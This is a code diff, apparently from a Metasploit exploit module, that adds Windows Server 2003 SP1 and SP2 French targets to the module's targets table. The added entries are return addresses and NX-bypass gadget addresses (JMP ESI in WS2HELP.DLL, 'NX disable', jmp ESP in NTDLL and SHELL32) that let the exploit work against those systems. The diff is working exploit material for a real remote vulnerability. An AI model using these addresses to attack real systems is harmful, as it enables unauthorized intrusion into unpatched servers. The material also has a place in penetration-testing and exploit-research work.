@@ -621,6 +621,26 @@ def initialize(info = {})
621621 'Scratch' => 0x00020408 ,
622622 }
623623 ] ,
624+ # Standard return-to-ESI without NX bypass
625+ # Added by Omar MEZRAG - 0xFFFFFF
626+ [ 'Windows 2003 SP1 French (NO NX)' ,
627+ {
628+ 'Ret' => 0x71ac1c40 ,
629+ 'Scratch' => 0x00020408
630+ }
631+ ] , # JMP ESI WS2HELP.DLL
632+
633+ # Brett Moore's crafty NX bypass for 2003 SP1
634+ # Added by Omar MEZRAG - 0xFFFFFF
635+ [ 'Windows 2003 SP1 French (NX)' ,
636+ {
637+ 'RetDec' => 0x7CA2568C , # dec ESI, ret @SHELL32.DLL
638+ 'RetPop' => 0x7CB47CF4 , # push ESI, pop EBP, ret 4 @SHELL32.DLL
639+ 'JmpESP' => 0x7C98FED3 , # jmp ESP @NTDLL.DLL
640+ 'DisableNX' => 0x7C95E413 , # NX disable @NTDLL.DLL
641+ 'Scratch' => 0x00020408
642+ }
643+ ] ,
624644
625645 # Standard return-to-ESI without NX bypass
626646 [ 'Windows 2003 SP2 English (NO NX)' ,
@@ -697,6 +717,26 @@ def initialize(info = {})
697717 'Scratch' => 0x00020408
698718 }
699719 ] , # JMP ESI WS2HELP.DLL
720+ # Standard return-to-ESI without NX bypass
721+ # Added by Omar MEZRAG - 0xFFFFFF
722+ [ 'Windows 2003 SP2 French (NO NX)' ,
723+ {
724+ 'Ret' => 0x71AC2069 ,
725+ 'Scratch' => 0x00020408
726+ }
727+ ] , # CALL ESI WS2HELP.DLL
728+
729+ # Brett Moore's crafty NX bypass for 2003 SP2
730+ # Added by Omar MEZRAG - 0xFFFFFF
731+ [ 'Windows 2003 SP2 French (NX)' ,
732+ {
733+ 'RetDec' => 0x7C98BEB8 , # dec ESI, ret @NTDLL.DLL
734+ 'RetPop' => 0x7CB3E84E , # push ESI, pop EBP, ret @SHELL32.DLL
735+ 'JmpESP' => 0x7C98A01B , # jmp ESP @NTDLL.DLL
736+ 'DisableNX' => 0x7C95F517 , # NX disable @NTDLL.DLL
737+ 'Scratch' => 0x00020408
738+ }
739+ ] ,
700740
701741 #
702742 # Missing Targets
0 commit comments